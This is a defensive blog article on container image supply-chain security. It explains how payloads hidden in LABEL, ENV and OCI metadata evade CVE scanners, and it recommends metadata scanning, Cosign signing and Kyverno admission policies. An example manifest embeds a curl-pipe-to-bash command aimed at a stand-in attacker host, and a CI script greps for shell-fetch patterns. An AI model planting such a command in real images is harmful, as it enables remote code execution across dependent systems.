TL;DR: CVE-focused image scanners like Trivy and Grype check layers against known vulnerability databases. They miss backdoors hidden in metadata fields like EXIF, LABEL, and OCI annotations. A clean scan report tells you nothing about whether the image is safe. A compromised base image silently propagates that trust to every derived image downstream. Defense requires three layers: metadata-aware scanning, cryptographic signature enforcement, and admission controllers that reject unverified base chains before they reach the cluster.
Key Takeaways: - A "clean" CVE scan is a statement about known vulnerabilities, not about image integrity - Metadata fields (EXIF, LABEL, ENV, OCI annotations) are a blind lane that CVE scanners never inspect - A backdoor in one base image inherits whitelisted status across every dependent image and golden image cache - Cosign signature verification, digest pinning, and admission policies close the inheritance loop
The Scanner Says Clean. The Backdoor Says Otherwise.

Your scanner reports zero critical CVEs. Your admission controller lets the image through. And somewhere in the EXIF metadata of the base layer, a one-line PHP shell waits for the first outbound connection.
This is not a hypothetical. CVE-focused scanners like Trivy, Grype, and Clair do exactly one job well. They compare each layer of an image against public vulnerability databases. They map package versions to known CVEs, flag outdated libraries, and produce a report you can gate your CI pipeline on.
That is useful work. It is also the only work they do.
Attackers who want into your cluster know this. They embed payloads in fields that no CVE database tracks. These include EXIF headers inside container artifacts, OCI LABEL and ENV entries, and annotations attached to the manifest itself.
None of these fields match a CVE pattern. The scanner reads the image, finds no flagged package, and returns clean. The container security posture looks green on every dashboard your team monitors, and the attack lane stays wide open.
Here is what makes it worse. Once a base image is approved and cached in your internal registry, every derived image inherits its whitelisted status. A single compromised base can fan out across hundreds of services through "golden image" repositories and shared FROM declarations. The scanner's green checkmark gets copied, retagged, and re-approved without ever looking at the layer where the backdoor lives.
If the scanner isn't broken, why does the backdoor keep getting through? The answer is in what the scanner was never designed to do.
Why CVE Scanning Can't See What Isn't a CVE
Public CVE databases catalog disclosed vulnerabilities. A new obfuscated webshell has no entry. A novel reverse shell tucked into a LABEL field has no entry. A PHP snippet that phones home through a seemingly innocent ENV variable has no entry. There is nothing for the scanner to find because there is nothing for the database to record.
Most image scanners treat the base layer as a black box of operating system packages. They enumerate libraries, check version strings, and compare against NVD feeds. Embedded binaries, embedded scripts, and metadata fields are outside their contract.
An attacker who weaponizes those fields is operating in a lane the scanner was never built to patrol. That lane is exactly where the attack lives.
This creates a dangerous misread by security leads. A "clean" scan result is a statement about known CVEs, not about the integrity of the image. Teams routinely read the former as the latter.
The dashboard says zero criticals. The build passes. The image ships. The supply chain security assumption underneath that flow is that the image is what it claims to be. That assumption is unverified, and attackers rely on it.
That integrity gap is exactly where metadata-based attacks live, and the technique is older than most scanners.
EXIF Headers, Hidden Labels, and the Payload You Don't Scan For
EXIF and other image metadata fields can carry arbitrary text. That includes short PHP, JavaScript, or shell snippets that survive image compression and container build steps.
The same mechanism that lets a photographer embed a copyright string lets an attacker embed a one-liner. The payload does not need to be in the executable filesystem. It just needs to land in a field that a downstream process or runtime will parse.
Container image manifests also store LABEL, ENV, and OCI annotations. An attacker who compromises a base image can hide commands in any of these. Consider this simplified view of an image manifest:
1{2 "schemaVersion": 2,3 "config": {4 "Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"],5 "Labels": {6 "maintainer": "security@internal",7 "build.timestamp": "$(curl -s http://attacker.example/x | bash)"8 }9 }10}
That Labels block looks ordinary. A scanner that only inspects package manifests will never flag it.
The string sits in a metadata field, not a package version, so no CVE rule fires. The attacker has hidden a command in a field that most pipelines copy forward without inspection.
These payloads bypass signature checks focused on the image digest. The malicious content lives in metadata fields that standard scanners never hash or inspect.
Cosign signs the digest. The digest matches. The signature validates. The backdoor rides along in a field the signature does not cover.
Now multiply that single backdoor across every image that uses the compromised base, and the scale of the problem becomes obvious.
The Base Layer Inheritance Trap
Every container image stacks a base layer beneath application layers. That is how `FROM` works.
A backdoor in the base is inherited by every downstream image that references it, and the inheritance is silent. The derived image's scan looks clean because the scanner is looking at the new top layers. The inherited base is treated as already trusted.
Internal base-image caches and "golden image" repositories make this worse. Teams pull a base, scan it, approve it, and push it to an internal registry under a friendly tag.
Other teams pull that same tag, extend it, and ship it. Re-tagging and re-approving happen across teams without re-inspecting the original base. A compromise at the source becomes an approved artifact at every downstream point.
Admission controllers configured to allow any image signed by the internal registry will accept the poisoned base without raising a flag.
The signature is valid. The registry is trusted. The devsecops pipeline is doing exactly what it was told to do, and exactly the wrong thing.
The only way to break the chain is to scan, sign, and enforce at the layer where the backdoor lives.
Adding Metadata Scanning to Your Image Pipeline

The fix is not exotic. It is a new scanning step bolted next to the one you already trust.
Add an EXIF and OCI-metadata inspection step alongside Trivy or Grype. Tools like Dive can enumerate layers. Custom scripts can walk LABEL, ENV, and annotation fields looking for suspicious payloads. These include shell substitutions, outbound URLs, base64 blobs, and command substitution patterns.
Here is a minimal inspection step you can add to a CI pipeline:
1#!/bin/bash2# Inspect OCI metadata fields for embedded payloads3set -euo pipefail4IMAGE="$1"5docker inspect "$IMAGE" --format '{{json .Config.Labels}}' \6 | grep -Ei '\$\(|curl |wget |base64|/bin/(ba)?sh' && \7 { echo "Suspicious label content in $IMAGE"; exit 1; }8docker inspect "$IMAGE" --format '{{json .Config.Env}}' \9 | grep -Ei '\$\(|curl |wget |/bin/(ba)?sh' && \10 { echo "Suspicious env content in $IMAGE"; exit 1; }11echo "Metadata scan clean: $IMAGE"
This is a starting point, not a complete solution. Production-grade metadata scanning should use purpose-built tools with curated rules, not a single grep. The point is to close the lane that CVE scanners leave open.
Enforce Cosign signature verification on base images. Any unsigned or re-tagged base layer should be rejected before it reaches the registry. Pin base images by digest, not by tag, and rebuild golden images from a cryptographically verified source on a fixed cadence.
Image scanning without signing is just logging. Signing without digest pinning is just theater.
Scanning and signing get you visibility, but visibility without enforcement is just a dashboard. That is where admission controllers earn their keep.
Admission Controllers as the Last Line of Defense
Policy engines like Kyverno, OPA/Gatekeeper, and Conftest can require signed images, pinned digests, and approved registries at deploy time. A well-written policy rejects any pod whose image references an unverified base layer. It closes the inheritance loop that scanners leave open.
The pod never starts. The compromised base never runs.
Here is a Kyverno policy fragment that enforces both:
1apiVersion: kyverno.io/v12kind: ClusterPolicy3metadata:4 name: require-signed-base-images5spec:6 validationFailureAction: Enforce7 rules: - name: verify-image-signature8 match:9 resources:10 kinds: ["Pod"]11 verifyImages: - imageReferences: - "registry.internal/*"12 attestors: - entries: - keys:13 publicKeys: |-14 -----BEGIN PUBLIC KEY-----15 <cosign public key>16 -----END PUBLIC KEY-----
Pair the admission policy with a continuously updated allowlist. When a base layer is flagged, the allowlist update propagates, and every new pod referencing it gets rejected. Newly discovered bad base images are blocked without redeploying the cluster.
Teams that build their own admission controller stack must develop, test, and harden every policy rule before it can protect production. That work compounds across every layer of the scanning, signing, and enforcement pipeline.
Once these three layers are in place, the question shifts from "did the scanner pass?" to "can the bad image even reach the cluster?"
What Changes When You Scan What Scanners Don't
Three layers, one outcome. CVE scanning catches known issues. Metadata scanning catches novel payloads. Admission control blocks both from ever running in your cluster. The gaps between them are where attackers live, and the layers close those gaps.
Supply chain integrity becomes provable rather than assumed. You can show, with cryptographic evidence, that every running image traces back to a signed, verified base. That is what auditors want to see.
Teams spend less time triaging "clean" images that turn out to be compromised. They spend more time shipping features.
The triage loop is expensive. Every false negative eats engineering hours, burns trust, and creates the kind of incident that ends careers.
Closing the metadata lane at build time, then enforcing it at admission time, removes the loop entirely.
The scanner is not the enemy. It is doing its job. The job is just bigger than one tool can handle, and the metadata lane is the part most teams never think to widen.
Frequently Asked Questions
Q: Can standard image scanners like Trivy detect backdoors in EXIF metadata?
A: No. Trivy, Grype, and most CVE-focused scanners match layer contents against known vulnerability databases. They do not parse EXIF, LABEL, or OCI annotation fields for embedded code. That is why metadata-based backdoors pass cleanly through them.
Q: What is the difference between CVE scanning and supply chain scanning?
A: CVE scanning answers "does this image contain a known vulnerable package?" Supply chain scanning answers "is this image exactly what I think it is?" The second question requires metadata inspection, signature verification, and base-layer provenance checks. CVE scanners do not perform those.
Q: How do admission controllers prevent base layer backdoors from running?
A: Admission controllers like Kyverno and OPA/Gatekeeper enforce policies at deploy time. When configured to require signed images and pinned digests from approved registries, they reject any pod whose image chain traces back to an unverified base layer.
Q: What is the fastest way to detect a compromised base image already in production?
A: Re-scan every image in your registry against a metadata-aware scanner, verify Cosign signatures on each base layer, and audit your admission controller logs for any pod admitted before the policy was tightened. Treat any base that fails metadata checks as compromised fleet-wide and force a rebuild. If your team needs this level of layered defense in place quickly, a managed deployment can shrink the window in which the metadata blind spot stays open.
Sources
Research and references cited in this article:
- Base Image Vulnerabilities: Risks, Real Examples, & How To ... - Wiz
- Container Vulnerability Scanning - Apiiro
- What Is Container Scanning? | CrowdStrike
- Container Image Scanning: How It Works and 5 Best Practices
- Base Image Detection - JFrog Docs
- Container Security And How To Secure Containers In 2026
- Secure containers software supply chain across the SDLC
- Container Security Scanning in DevSecOps Pipelines Guide
- DevSecOps Implementation: SAST, DAST & SCA Tools | BSG
- 12 container image scanning best practices | Sysdig
- 8 Container Security Best Practices for 2026 | Orca Security
- 10 Container Security Best Practices in 2026
About the author
Mayank Singh is a software developer at Levitation Infotech, where he builds web and AI-powered applications across the company’s fintech, healthcare, and enterprise projects.
